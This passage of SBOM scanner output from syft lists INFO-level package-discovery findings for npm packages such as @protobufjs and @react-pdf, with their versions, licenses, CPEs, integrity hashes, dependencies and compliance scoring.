- cpe: cpe:2.3:a:\@protobufjs\/aspromise:\@protobufjs\/aspromise:1.1.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40protobufjs/aspromise@1.1.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@protobufjs/aspromise/-/aspromise-1.1.2.tgz
integrity: sha512-j+gKExEuLmKwvz3OgROXtrJ2UG2x8Ch2YZUxahh+s1F2HZ+wAceUNLkvy6zKCPVRkU++ZWQrdxsUeQXmcg4uoQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: e4bf388f995dc845
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @protobufjs/base64 1.1.2'
title: '@protobufjs/base64 1.1.2'
description: 'Package discovered: @protobufjs/base64 1.1.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 493d13966d12b3a0
name: '@protobufjs/base64'
version: 1.1.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: BSD-3-Clause
spdxExpression: BSD-3-Clause
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@protobufjs\/base64:\@protobufjs\/base64:1.1.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40protobufjs/base64@1.1.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@protobufjs/base64/-/base64-1.1.2.tgz
integrity: sha512-AZkcAA5vnN/v4PDqKyMR5lx7hZttPDgClv83E//FMNhR2TMcLUhfRUBHCmSl0oi9zMgDDqRUJkSxO3wm85+XLg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: fad1d6a5684086d4
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @protobufjs/codegen 2.0.5'
title: '@protobufjs/codegen 2.0.5'
description: 'Package discovered: @protobufjs/codegen 2.0.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 12a6d95fe5a62fc1
name: '@protobufjs/codegen'
version: 2.0.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: BSD-3-Clause
spdxExpression: BSD-3-Clause
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@protobufjs\/codegen:\@protobufjs\/codegen:2.0.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40protobufjs/codegen@2.0.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@protobufjs/codegen/-/codegen-2.0.5.tgz
integrity: sha512-zgXFLzW3Ap33e6d0Wlj4MGIm6Ce8O89n/apUaGNB/jx+hw+ruWEp7EwGUshdLKVRCxZW12fp9r40E1mQrf/34g==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: efbb149e9a326e2c
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @protobufjs/eventemitter 1.1.0'
title: '@protobufjs/eventemitter 1.1.0'
description: 'Package discovered: @protobufjs/eventemitter 1.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 7097fcb2aeb00411
name: '@protobufjs/eventemitter'
version: 1.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: BSD-3-Clause
spdxExpression: BSD-3-Clause
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@protobufjs\/eventemitter:\@protobufjs\/eventemitter:1.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40protobufjs/eventemitter@1.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@protobufjs/eventemitter/-/eventemitter-1.1.0.tgz
integrity: sha512-j9ednRT81vYJ9OfVuXG6ERSTdEL1xVsNgqpkxMsbIabzSo3goCjDIveeGv5d03om39ML71RdmrGNjG5SReBP/Q==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 817b2c8a979dff10
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @protobufjs/fetch 1.1.0'
title: '@protobufjs/fetch 1.1.0'
description: 'Package discovered: @protobufjs/fetch 1.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 4ed2c80c8ad8c116
name: '@protobufjs/fetch'
version: 1.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: BSD-3-Clause
spdxExpression: BSD-3-Clause
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@protobufjs\/fetch:\@protobufjs\/fetch:1.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40protobufjs/fetch@1.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@protobufjs/fetch/-/fetch-1.1.0.tgz
integrity: sha512-lljVXpqXebpsijW71PZaCYeIcE5on1w5DlQy5WH6GLbFryLUrBD4932W/E2BSpfRJWseIL4v/KPgBFxDOIdKpQ==
dependencies:
'@protobufjs/aspromise': ^1.1.1
'@protobufjs/inquire': ^1.1.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 253d6aca6c381638
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @protobufjs/float 1.0.2'
title: '@protobufjs/float 1.0.2'
description: 'Package discovered: @protobufjs/float 1.0.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: dda6f1aef9d11e58
name: '@protobufjs/float'
version: 1.0.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: BSD-3-Clause
spdxExpression: BSD-3-Clause
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@protobufjs\/float:\@protobufjs\/float:1.0.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40protobufjs/float@1.0.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@protobufjs/float/-/float-1.0.2.tgz
integrity: sha512-Ddb+kVXlXst9d+R9PfTIxh1EdNkgoRe5tOX6t01f1lYWOvJnSPDBlG241QLzcyPdoNTsblLUdujGSE4RzrTZGQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 7699234b047c9f55
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @protobufjs/inquire 1.1.1'
title: '@protobufjs/inquire 1.1.1'
description: 'Package discovered: @protobufjs/inquire 1.1.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: a8f805afd5f928e8
name: '@protobufjs/inquire'
version: 1.1.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: BSD-3-Clause
spdxExpression: BSD-3-Clause
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@protobufjs\/inquire:\@protobufjs\/inquire:1.1.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40protobufjs/inquire@1.1.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@protobufjs/inquire/-/inquire-1.1.1.tgz
integrity: sha512-mnzgDV26ueAvk7rsbt9L7bE0SuAoqyuys/sMMrmVcN5x9VsxpcG3rqAUSgDyLp0UZlmNfIbQ4fHfCtreVBk8Ew==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 0888dd200a4f8fb9
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @protobufjs/path 1.1.2'
title: '@protobufjs/path 1.1.2'
description: 'Package discovered: @protobufjs/path 1.1.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 742d5880151b22a5
name: '@protobufjs/path'
version: 1.1.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: BSD-3-Clause
spdxExpression: BSD-3-Clause
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@protobufjs\/path:\@protobufjs\/path:1.1.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40protobufjs/path@1.1.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@protobufjs/path/-/path-1.1.2.tgz
integrity: sha512-6JOcJ5Tm08dOHAbdR3GrvP+yUUfkjG5ePsHYczMFLq3ZmMkAD98cDgcT2iA1lJ9NVwFd4tH/iSSoe44YWkltEA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 37fb5baaf891bf3b
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @protobufjs/pool 1.1.0'
title: '@protobufjs/pool 1.1.0'
description: 'Package discovered: @protobufjs/pool 1.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 2f9166cf527d1f74
name: '@protobufjs/pool'
version: 1.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: BSD-3-Clause
spdxExpression: BSD-3-Clause
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@protobufjs\/pool:\@protobufjs\/pool:1.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40protobufjs/pool@1.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@protobufjs/pool/-/pool-1.1.0.tgz
integrity: sha512-0kELaGSIDBKvcgS4zkjz1PeddatrjYcmMWOlAuAPwAeccUrPHdUqo/J6LiymHHEiJT5NrF1UVwxY14f+fy4WQw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 008b4e7e3539d471
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @protobufjs/utf8 1.1.1'
title: '@protobufjs/utf8 1.1.1'
description: 'Package discovered: @protobufjs/utf8 1.1.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: afb917b3027623df
name: '@protobufjs/utf8'
version: 1.1.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: BSD-3-Clause
spdxExpression: BSD-3-Clause
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@protobufjs\/utf8:\@protobufjs\/utf8:1.1.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40protobufjs/utf8@1.1.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@protobufjs/utf8/-/utf8-1.1.1.tgz
integrity: sha512-oOAWABowe8EAbMyWKM0tYDKi8Yaox52D+HWZhAIJqQXbqe0xI/GV7FhLWqlEKreMkfDjshR5FKgi3mnle0h6Eg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: b1e07271de6eec7b
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @react-email/render 0.0.16'
title: '@react-email/render 0.0.16'
description: 'Package discovered: @react-email/render 0.0.16'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: e1894e7a0de3acac
name: '@react-email/render'
version: 0.0.16
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@react-email\/render:\@react-email\/render:0.0.16:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react-email\/render:\@react_email\/render:0.0.16:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_email\/render:\@react-email\/render:0.0.16:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_email\/render:\@react_email\/render:0.0.16:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react-email\/render:0.0.16:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react_email\/render:0.0.16:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40react-email/render@0.0.16
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@react-email/render/-/render-0.0.16.tgz
integrity: sha512-wDaMy27xAq1cJHtSFptp0DTKPuV2GYhloqia95ub/DH9Dea1aWYsbdM918MOc/b/HvVS3w1z8DWzfAk13bGStQ==
dependencies:
html-to-text: 9.0.5
js-beautify: ^1.14.11
react-promise-suspense: 0.3.4
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 2e3b9f0f7d4d1d7f
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @react-pdf/fns 2.2.1'
title: '@react-pdf/fns 2.2.1'
description: 'Package discovered: @react-pdf/fns 2.2.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 38462ff4454997a0
name: '@react-pdf/fns'
version: 2.2.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@react-pdf\/fns:\@react-pdf\/fns:2.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react-pdf\/fns:\@react_pdf\/fns:2.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/fns:\@react-pdf\/fns:2.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/fns:\@react_pdf\/fns:2.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react-pdf\/fns:2.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react_pdf\/fns:2.2.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40react-pdf/fns@2.2.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@react-pdf/fns/-/fns-2.2.1.tgz
integrity: sha512-s78aDg0vDYaijU5lLOCsUD+qinQbfOvcNeaoX9AiE7+kZzzCo6B/nX+l48cmt9OosJmvZvE9DWR9cLhrhOi2pA==
dependencies:
'@babel/runtime': ^7.20.13
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 06f3ac6357300fe3
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @react-pdf/fns 3.1.3'
title: '@react-pdf/fns 3.1.3'
description: 'Package discovered: @react-pdf/fns 3.1.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 4656650b2a6dd236
name: '@react-pdf/fns'
version: 3.1.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@react-pdf\/fns:\@react-pdf\/fns:3.1.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react-pdf\/fns:\@react_pdf\/fns:3.1.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/fns:\@react-pdf\/fns:3.1.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/fns:\@react_pdf\/fns:3.1.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react-pdf\/fns:3.1.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react_pdf\/fns:3.1.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40react-pdf/fns@3.1.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@react-pdf/fns/-/fns-3.1.3.tgz
integrity: sha512-0I7pApDr1/RLAKbizuLy/IHTEa93LSPy/bEwYniboC3Xqnp6Od8xFJKbKEzGw2wh/5zKFFwl00g4t9RwgIMc3w==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 0e189b3633f52f28
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @react-pdf/font 2.5.2'
title: '@react-pdf/font 2.5.2'
description: 'Package discovered: @react-pdf/font 2.5.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 15064a64821e35da
name: '@react-pdf/font'
version: 2.5.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@react-pdf\/font:\@react-pdf\/font:2.5.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react-pdf\/font:\@react_pdf\/font:2.5.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/font:\@react-pdf\/font:2.5.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/font:\@react_pdf\/font:2.5.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react-pdf\/font:2.5.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react_pdf\/font:2.5.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40react-pdf/font@2.5.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@react-pdf/font/-/font-2.5.2.tgz
integrity: sha512-Ud0EfZ2FwrbvwAWx8nz+KKLmiqACCH9a/N/xNDOja0e/YgSnqTpuyHegFBgIMKjuBtO5dNvkb4dXkxAhGe/ayw==
dependencies:
'@babel/runtime': ^7.20.13
'@react-pdf/types': ^2.6.0
cross-fetch: ^3.1.5
fontkit: ^2.0.2
is-url: ^1.2.4
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 325345669fb318b9
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @react-pdf/font 4.0.8'
title: '@react-pdf/font 4.0.8'
description: 'Package discovered: @react-pdf/font 4.0.8'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 19aa56c736ba6f4e
name: '@react-pdf/font'
version: 4.0.8
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@react-pdf\/font:\@react-pdf\/font:4.0.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react-pdf\/font:\@react_pdf\/font:4.0.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/font:\@react-pdf\/font:4.0.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/font:\@react_pdf\/font:4.0.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react-pdf\/font:4.0.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react_pdf\/font:4.0.8:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40react-pdf/font@4.0.8
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@react-pdf/font/-/font-4.0.8.tgz
integrity: sha512-deNd+emtZAJho1IlzKL9bRoLAGv/6oXOIKO2oZfs4RuXUrK1onLHbJO7e2YoVLPFP/sQxisRTnzdJFtd35iKwA==
dependencies:
'@react-pdf/pdfkit': ^5.1.1
'@react-pdf/types': ^2.11.1
fontkit: ^2.0.2
is-url: ^1.2.4
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: a9ddc08bb5c72c17
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @react-pdf/image 2.3.6'
title: '@react-pdf/image 2.3.6'
description: 'Package discovered: @react-pdf/image 2.3.6'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: e700f7d1572a4159
name: '@react-pdf/image'
version: 2.3.6
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@react-pdf\/image:\@react-pdf\/image:2.3.6:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react-pdf\/image:\@react_pdf\/image:2.3.6:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/image:\@react-pdf\/image:2.3.6:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/image:\@react_pdf\/image:2.3.6:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react-pdf\/image:2.3.6:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react_pdf\/image:2.3.6:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40react-pdf/image@2.3.6
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@react-pdf/image/-/image-2.3.6.tgz
integrity: sha512-7iZDYZrZlJqNzS6huNl2XdMcLFUo68e6mOdzQeJ63d5eApdthhSHBnkGzHfLhH5t8DCpZNtClmklzuLL63ADfw==
dependencies:
'@babel/runtime': ^7.20.13
'@react-pdf/png-js': ^2.3.1
cross-fetch: ^3.1.5
jay-peg: ^1.0.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 751c0bb9092b6d5a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @react-pdf/layout 3.13.0'
title: '@react-pdf/layout 3.13.0'
description: 'Package discovered: @react-pdf/layout 3.13.0'
remediation: Track and scan dependencies.
references: []
tags:
